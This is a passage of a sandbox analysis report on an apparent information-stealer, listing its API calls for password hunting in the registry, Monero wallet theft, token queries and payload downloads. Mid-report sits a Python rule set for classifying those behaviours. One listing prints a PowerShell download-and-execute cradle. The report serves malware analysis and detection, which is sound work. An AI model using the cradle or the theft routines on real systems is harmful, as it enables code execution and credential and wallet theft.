                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 0e86810073114247876769721b07f604a63476ed222c87c0223b149e2a7acf1d
                        • Instruction ID: 9c9f2e1b7c49c983b025533d297a3c2747b61fc9c8a7ca5558d9af88185fccec
                        • Opcode Fuzzy Hash: 0e86810073114247876769721b07f604a63476ed222c87c0223b149e2a7acf1d
                        • Instruction Fuzzy Hash: 54515FB1A00218ABDF24EFA0DC45BEE77B9FB44701F108199B605A71C0DB746E85CF95
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0069733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00697452
                        • HeapFree.KERNEL32(00000000), ref: 00697459
                        • task.LIBCPMTD ref: 00697555
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: the same fourteen memory dumps (00690000 through 00D28000) listed under the first function entry above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: f7c7ef32a996843ea5cb9af8dc149721e1192b31c841b8b5d6dc35d0b24368c6
                        • Instruction ID: 93bc6b8df2eea709506bea50df9473216ba4b983cf589a9c7fc043bcb5afe6ff
                        • Opcode Fuzzy Hash: f7c7ef32a996843ea5cb9af8dc149721e1192b31c841b8b5d6dc35d0b24368c6
                        • Instruction Fuzzy Hash: B76117B59141689BDB24DB50CC41BEAB7BDBF44300F0081E9E689A7641DB706BC9CFA5
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        • lstrlen.KERNEL32(00000000), ref: 0069BC9F
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0069BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0069BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0069BDB9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: the same fourteen memory dumps (00690000 through 00D28000) listed under the first function entry above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 224f72526152e8ce1653f42a8826d24bf39ece57cdf1f25c06e12acc731f660c
                        • Instruction ID: 13d796a7082a902013f333db9c996eac5a23beed4dcd89c577630b7529505946
                        • Opcode Fuzzy Hash: 224f72526152e8ce1653f42a8826d24bf39ece57cdf1f25c06e12acc731f660c
                        • Instruction Fuzzy Hash: 03B11B71910108ABDB84FBE0DD96EEE737AAF15300F50415EF506A6092EF34AE49CF66
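The API listings in the entries above are the raw material for triage: the download-to-disk routine (InternetOpenUrlA, CreateFileA, InternetReadFile, WriteFile), the Monero wallet routine (registry lookup via RegOpenKeyExA/RegQueryValueExA, a path ending in `\Monero\wallet.keys`, then CopyFileA and DeleteFileA), the registry sweep that enumerates HKEY_CURRENT_USER values (0x80000001) and runs StrStrA for `Password`, and the Chromium `encrypted_key` decode. The following is an added example, not part of the report and not Joe Sandbox's or the sample's code: a Python parser for Joe Sandbox-style API bullets, with ordered-call rules that turn those listings into behaviour labels. The rule names and thresholds are this example's own; the sample input is copied verbatim from three function entries on this page.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# One Joe Sandbox "APIs" bullet, either a direct call or a
# "Part of subcall function XXXXXXXX:" line, for example:
#   • InternetReadFile.WININET(?,?,00000400,?), ref: 006961DC
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$",
    re.IGNORECASE,
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                     # address of the call site
    subcall: str | None = None   # callee address when the bullet came from a subcall


def parse_api_lines(text: str) -> list[ApiCall]:
    """Parse the bullets of one function entry; lines that are not API calls are skipped.
    Arguments are split on ',' which is adequate for the report's hex and '?' tokens."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"].upper(), args, m["ref"].upper(), m["sub"]))
    return calls


def in_order(calls: list[ApiCall], wanted: list[str]) -> bool:
    """True when the names in `wanted` occur in that order; other calls may sit in between."""
    names = iter(c.api for c in calls)
    return all(any(n == w for n in names) for w in wanted)


def arg_contains(calls: list[ApiCall], api: str, needle: str) -> bool:
    return any(c.api == api and any(needle in a for a in c.args) for c in calls)


def any_arg(calls: list[ApiCall], needle: str) -> bool:
    return any(needle in a for c in calls for a in c.args)


# Behaviour rules written from the call sequences the function entries on this page show.
RULES = {
    "download_to_disk": lambda c: in_order(c, ["InternetOpenUrlA", "CreateFileA", "InternetReadFile", "WriteFile"]),
    "registry_password_hunt": lambda c: in_order(c, ["RegOpenKeyExA", "RegEnumValueA"])
    and arg_contains(c, "StrStrA", "Password"),
    "wallet_file_copy": lambda c: in_order(c, ["RegOpenKeyExA", "RegQueryValueExA", "CopyFileA"])
    and any_arg(c, "wallet.keys"),
    "chromium_key_extract": lambda c: arg_contains(c, "StrStrA", "encrypted_key")
    and any(call.api == "CryptStringToBinaryA" for call in c),
}


def classify(entry_text: str) -> list[str]:
    calls = parse_api_lines(entry_text)
    return [name for name, rule in RULES.items() if rule(calls)]


# Constructed input: API bullets copied from three function entries on this page.
SAMPLES = {
    "download": r"""
• Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
• Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
• Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
• InternetOpenA.WININET(006B0DF7,00000001,00000000,00000000,00000000), ref: 0069610F
• StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696147
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0069618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006961B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 006961DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0069620A
• CloseHandle.KERNEL32(?,?,00000400), ref: 00696249
• InternetCloseHandle.WININET(?), ref: 00696253
• InternetCloseHandle.WININET(00000000), ref: 00696260
""",
    "registry": r"""
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0069733A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
• GetProcessHeap.KERNEL32(00000000,?), ref: 00697452
• HeapFree.KERNEL32(00000000), ref: 00697459
• task.LIBCPMTD ref: 00697555
""",
    "monero": r"""
• Part of subcall function 006912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006912D7
• Part of subcall function 006912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006912F5
• Part of subcall function 006912A0: RegCloseKey.ADVAPI32(?), ref: 006912FF
• lstrcat.KERNEL32(?,.keys), ref: 00691377
• Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 00691465
• DeleteFileA.KERNEL32(00000000), ref: 006914EF
""",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name}: {classify(text)}")
```

Ordered subsequence matching rather than a bag of API names is what keeps the rules honest: a function that merely imports WriteFile and InternetReadFile is not a downloader, while the order open URL, create file, read, write is. Subcall bullets are kept with their callee address so that a rule can later be tightened to direct calls only if nested helpers (lstrcpy/lstrcat wrappers here) produce noise.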
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: the same fourteen memory dumps (00690000 through 00D28000) listed under the first function entry above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: fa14b9605d1e332205a09ecced430a85ea78df1f626f8d044f9631b30f79a2dc
                        • Instruction ID: 59ace504558743facb5b9ba6c8a39549be4d1dcc0d0d66870b89d16c60f8caa0
                        • Opcode Fuzzy Hash: fa14b9605d1e332205a09ecced430a85ea78df1f626f8d044f9631b30f79a2dc
                        • Instruction Fuzzy Hash: 86F05E3091520DEFD348AFE0E90976C7BB0FB05703F28029AF64986390DA708B41DF96
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00694FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00694FD1
                        • InternetOpenA.WININET(006B0DDF,00000000,00000000,00000000,00000000), ref: 00694FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00695011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00695041
                        • InternetCloseHandle.WININET(?), ref: 006950B9
                        • InternetCloseHandle.WININET(?), ref: 006950C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: d3a1d3765695ac08486d51204a4b7a6411f082ce538bd1cb8d82702758526bd7
                        • Instruction ID: 56c671bd55e547ec4f5a3c752b1fc6683988122d1131f7d8507720b6ad1cf211
                        • Opcode Fuzzy Hash: d3a1d3765695ac08486d51204a4b7a6411f082ce538bd1cb8d82702758526bd7
                        • Instruction Fuzzy Hash: 4B3107B4A00218ABDB24DF54DC85BDDB7B9FB48704F2081D9EA09A7280C7706EC58F99
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0126F328,00000000,?,006B0E2C,00000000,?,00000000), ref: 006A8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006A8158
                        • wsprintfA.USER32 ref: 006A81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2922868504-3474575989
                        • Opcode ID: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
                        • Instruction ID: 605e15297609a5c875208ad69b228240cc208edcc15799d1bdc6d0a37641974b
                        • Opcode Fuzzy Hash: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
                        • Instruction Fuzzy Hash: 7E213EB1E44218ABDB04DFD4CC49FAEB7B9FB45700F204619F605BB280D77859018BA5
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
                        • wsprintfA.USER32 ref: 006A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A8499
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0126F1D8,00000000,000F003F,?,00000400), ref: 006A84EC
                        • lstrlen.KERNEL32(?), ref: 006A8501
                        • RegQueryValueExA.ADVAPI32(00000000,0126F3D0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006B0B34), ref: 006A8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 8478a1890e73e11f8940969b311ba1ff6d7c07319c22447b53d58b75ed52ca57
                        • Instruction ID: b1af3d04a59c19f12e0f728aae7494639a94d19474fa96d982f8216720bfb077
                        • Opcode Fuzzy Hash: 8478a1890e73e11f8940969b311ba1ff6d7c07319c22447b53d58b75ed52ca57
                        • Instruction Fuzzy Hash: A3210AB19012189FDB68DB54DC85FE9B7B9FB48700F10C199E60996140DF71AE85CFD4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0125C138,00000000,00020119,00000000), ref: 006A76DD
                        • RegQueryValueExA.ADVAPI32(00000000,0126F478,00000000,00000000,?,000000FF), ref: 006A76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
                        • Instruction ID: 88fc5fa67054846b9f33120d83a2612d5a5b64bcb71a355b302ef9abf83a141a
                        • Opcode Fuzzy Hash: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
                        • Instruction Fuzzy Hash: C9014FB5A45204BBEB04EBE4DC49FAEB7B9FB48701F204155FA04A7290D67099009F51
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0125C138,00000000,00020119,006A76B9), ref: 006A775B
                        • RegQueryValueExA.ADVAPI32(006A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006A777A
                        • RegCloseKey.ADVAPI32(006A76B9), ref: 006A7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
                        • Instruction ID: cad26b8189b524b72071b478516a7b74045f5b2b71fb5e484219a4d261cce944
                        • Opcode Fuzzy Hash: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
                        • Instruction Fuzzy Hash: 9C0144B5A40308BBD704DBE4DC49FAEB7B8FB44701F104559FA05A7281D67059408F51
                        APIs
                        • CreateFileA.KERNEL32(:j,80000000,00000003,00000000,00000003,00000080,00000000,?,006A3AEE,?), ref: 006A92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:j), ref: 006A9319
                        • CloseHandle.KERNEL32(000000FF), ref: 006A9327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :j$:j
                        • API String ID: 1378416451-347553651
                        • Opcode ID: f14f4b465b63443dbfa492e9c63d0989d4fdb5415f319714bdcf1792122d6816
                        • Instruction ID: eed8ce2e51409e7d854d9e29382bb14c7c08169a2e68e806ad6ffcf711911981
                        • Opcode Fuzzy Hash: f14f4b465b63443dbfa492e9c63d0989d4fdb5415f319714bdcf1792122d6816
                        • Instruction Fuzzy Hash: F9F03C35E40208BBDF14EBB0DC49B9E77FABB49711F20C294B651A72C0DA719A018F50
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                        • LocalFree.KERNEL32(0069148F), ref: 00699A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 590a49903bd483b56ab03ef9d38fdc4d8ffcb869a4c5b39fe70d937b2f4c0aae
                        • Instruction ID: 374a7525219daaa603970d033f96fe29f3dace69886ff5ff1bd48f848da10ecb
                        • Opcode Fuzzy Hash: 590a49903bd483b56ab03ef9d38fdc4d8ffcb869a4c5b39fe70d937b2f4c0aae
                        • Instruction Fuzzy Hash: 3031E2B4A00209EFDF14CF94C885BEE77BAFF48350F208159E911A7290D779AA41CFA1
                        APIs
                        • lstrcat.KERNEL32(?,0126F580), ref: 006A47DB
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4801
                        • lstrcat.KERNEL32(?,?), ref: 006A4820
                        • lstrcat.KERNEL32(?,?), ref: 006A4834
                        • lstrcat.KERNEL32(?,0125B738), ref: 006A4847
                        • lstrcat.KERNEL32(?,?), ref: 006A485B
                        • lstrcat.KERNEL32(?,0126E910), ref: 006A486F
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006A8D90: GetFileAttributesA.KERNEL32(00000000,?,00691B54,?,?,006B564C,?,?,006B0E1F), ref: 006A8D9F
                          • Part of subcall function 006A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006A4580
                          • Part of subcall function 006A4570: RtlAllocateHeap.NTDLL(00000000), ref: 006A4587
                          • Part of subcall function 006A4570: wsprintfA.USER32 ref: 006A45A6
                          • Part of subcall function 006A4570: FindFirstFileA.KERNEL32(?,?), ref: 006A45BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 046175a15adfe31770b03ab34227475eca4d89e782eb98e0196f056acb89f7dc
                        • Instruction ID: 3d280ff7fd9180266fe08f2ed242d1c97ce89f9ac49564f189284b726d08dbf8
                        • Opcode Fuzzy Hash: 046175a15adfe31770b03ab34227475eca4d89e782eb98e0196f056acb89f7dc
                        • Instruction Fuzzy Hash: 17317FB2D00208ABCB54FBB0DC85EEA737DBB49700F40459DB71996091EE749B89CF99
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A2D85
                        Strings
                        • ')", xrefs: 006A2CB3
                        • <, xrefs: 006A2D39
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 006A2CC4
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 006A2D04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: a5062ac8c867b54bb3f7fc3dd26bf6a9dfbc17e5f24e3540ab8f96a183ec5422
                        • Instruction ID: b6a478bae377998d061eb281bb9a49fa8a93ab58f9926382d4f58b8b806fbbfa
                        • Opcode Fuzzy Hash: a5062ac8c867b54bb3f7fc3dd26bf6a9dfbc17e5f24e3540ab8f96a183ec5422
                        • Instruction Fuzzy Hash: 4641DE71D102089ADB94FFE0C891BEEBB76AF15300F50411EE106A7192DF746E8ACF95
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00699F41
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: ac31f320eb3bbd6ff7f98895637c9fd31cf88f9cc394115a4d2e8bba42125964
                        • Instruction ID: fe0136cb33f39c26fb8392c02144f9f27e3cbc91d7ec736dffcd9dad94b92917
                        • Opcode Fuzzy Hash: ac31f320eb3bbd6ff7f98895637c9fd31cf88f9cc394115a4d2e8bba42125964
                        • Instruction Fuzzy Hash: EF6151709002089BDF54EFA4CC96FEE77BAAF45304F008118F90A9F581EB746E46CB95
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0126E9F0,00000000,00020119,?), ref: 006A40F4
                        • RegQueryValueExA.ADVAPI32(?,0126F670,00000000,00000000,00000000,000000FF), ref: 006A4118
                        • RegCloseKey.ADVAPI32(?), ref: 006A4122
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4147
                        • lstrcat.KERNEL32(?,0126F688), ref: 006A415B
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 4817573bd02948983d7dd4c2145572abea7a223df67361e56c2fad9874fe8a0b
                        • Instruction ID: d75f2194d8d77964aaec1d40af1cf15453f90fe6cf63b1904440ce9a2f1e229e
                        • Opcode Fuzzy Hash: 4817573bd02948983d7dd4c2145572abea7a223df67361e56c2fad9874fe8a0b
                        • Instruction Fuzzy Hash: BB41D7B6D001086BDF18FBA0DC56FFE733EBB89300F50465DB61657181EA755B888BA2
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0125BFB0,00000000,00020119,?), ref: 006A7E5E
                        • RegQueryValueExA.ADVAPI32(?,0126E710,00000000,00000000,000000FF,000000FF), ref: 006A7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 006A7E92
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
                        • Instruction ID: 40f2f7a19c7dc83b332553058dcd6db32e47d608c3aae60f407752f8016afc94
                        • Opcode Fuzzy Hash: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
                        • Instruction Fuzzy Hash: 8E115EB1A44205EBDB04DF94DD49FBBBBB9FB44B10F20425AFA06A7280D7745D018FA1
                        APIs
                        • StrStrA.SHLWAPI(0126F460,?,?,?,006A140C,?,0126F460,00000000), ref: 006A926C
                        • lstrcpyn.KERNEL32(008DAB88,0126F460,0126F460,?,006A140C,?,0126F460), ref: 006A9290
                        • lstrlen.KERNEL32(?,?,006A140C,?,0126F460), ref: 006A92A7
                        • wsprintfA.USER32 ref: 006A92C7
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 150806ed609558c0d8544418e34c76d67d75315af0f709c48f6e22b5150ee926
                        • Instruction ID: 5df33ea054577a39f4443dfc57613203b247693b0daec723d4eca2e23ba694c2
                        • Opcode Fuzzy Hash: 150806ed609558c0d8544418e34c76d67d75315af0f709c48f6e22b5150ee926
                        • Instruction Fuzzy Hash: 2A01CC75501108FFCB08DFECD984EAE7BB9FB48364F208249F9099B344C631AA41DB91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006912B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006912BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006912D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006912F5
                        • RegCloseKey.ADVAPI32(?), ref: 006912FF
                        Yara matches
